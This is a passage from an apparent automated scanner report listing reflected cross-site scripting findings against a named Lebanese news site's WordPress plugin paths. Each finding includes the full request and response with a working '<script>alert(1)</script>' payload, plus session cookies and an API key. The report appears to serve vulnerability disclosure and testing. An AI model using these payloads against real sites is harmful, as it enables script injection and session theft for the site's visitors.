X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsb64b0\"><script>alert(1)</script>ace49c136b8/fbconnect/fbconnect.css?ver=svn-62'; }); return true;" >
...[SNIP]...

4.215. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9899b"><script>alert(1)</script>375893412e0 was submitted in the REST URL parameter 3. This input was echoed as 9899b\"><script>alert(1)</script>375893412e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnect9899b"><script>alert(1)</script>375893412e0/fbconnect.css?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnect9899b\"><script>alert(1)</script>375893412e0/fbconnect.css?ver=svn-62'; }); return true;" >
...[SNIP]...

4.216. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9b1"><script>alert(1)</script>c5dd366a286 was submitted in the REST URL parameter 4. This input was echoed as 5c9b1\"><script>alert(1)</script>c5dd366a286 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnect/fbconnect.css5c9b1"><script>alert(1)</script>c5dd366a286?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnect/fbconnect.css5c9b1\"><script>alert(1)</script>c5dd366a286?ver=svn-62'; }); return true;" >
...[SNIP]...

4.217. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0ed"><script>alert(1)</script>65331bb50cf was submitted in the REST URL parameter 1. This input was echoed as 7c0ed\"><script>alert(1)</script>65331bb50cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content7c0ed"><script>alert(1)</script>65331bb50cf/plugins/fbconnect/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content7c0ed\"><script>alert(1)</script>65331bb50cf/plugins/fbconnect/xd_receiver.htm'; }); return true;" >
...[SNIP]...

4.218. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c325"><script>alert(1)</script>ba38a78e066 was submitted in the REST URL parameter 2. This input was echoed as 5c325\"><script>alert(1)</script>ba38a78e066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins5c325"><script>alert(1)</script>ba38a78e066/fbconnect/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:27 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins5c325\"><script>alert(1)</script>ba38a78e066/fbconnect/xd_receiver.htm'; }); return true;" >
...[SNIP]...

4.219. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af9c3"><script>alert(1)</script>f364751cc0c was submitted in the REST URL parameter 3. This input was echoed as af9c3\"><script>alert(1)</script>f364751cc0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnectaf9c3"><script>alert(1)</script>f364751cc0c/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnectaf9c3\"><script>alert(1)</script>f364751cc0c/xd_receiver.htm'; }); return true;" >
...[SNIP]...

4.220. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb2d9"><script>alert(1)</script>637e04eddad was submitted in the REST URL parameter 4. This input was echoed as cb2d9\"><script>alert(1)</script>637e04eddad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/fbconnect/xd_receiver.htmcb2d9"><script>alert(1)</script>637e04eddad HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:43 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/fbconnect/xd_receiver.htmcb2d9\"><script>alert(1)</script>637e04eddad'; }); return true;" >
...[SNIP]...

4.221. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90d9f"><script>alert(1)</script>542b5f7bd06 was submitted in the REST URL parameter 1. This input was echoed as 90d9f\"><script>alert(1)</script>542b5f7bd06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content90d9f"><script>alert(1)</script>542b5f7bd06/plugins/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content90d9f\"><script>alert(1)</script>542b5f7bd06/plugins/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.222. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25d2b"><script>alert(1)</script>68c4272be60 was submitted in the REST URL parameter 2. This input was echoed as 25d2b\"><script>alert(1)</script>68c4272be60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins25d2b"><script>alert(1)</script>68c4272be60/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins25d2b\"><script>alert(1)</script>68c4272be60/jquery-t-countdown-widget/css/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.223. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec0b3"><script>alert(1)</script>dcb07dde93d was submitted in the REST URL parameter 3. This input was echoed as ec0b3\"><script>alert(1)</script>dcb07dde93d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widgetec0b3"><script>alert(1)</script>dcb07dde93d/css/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widgetec0b3\"><script>alert(1)</script>dcb07dde93d/css/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.224. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1766c"><script>alert(1)</script>a3cebe2e404 was submitted in the REST URL parameter 4. This input was echoed as 1766c\"><script>alert(1)</script>a3cebe2e404 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/css1766c"><script>alert(1)</script>a3cebe2e404/carbonite/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:21 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/css1766c\"><script>alert(1)</script>a3cebe2e404/carbonite/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.225. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30e71"><script>alert(1)</script>7fa7d2fe231 was submitted in the REST URL parameter 5. This input was echoed as 30e71\"><script>alert(1)</script>7fa7d2fe231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/css/carbonite30e71"><script>alert(1)</script>7fa7d2fe231/style.css?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
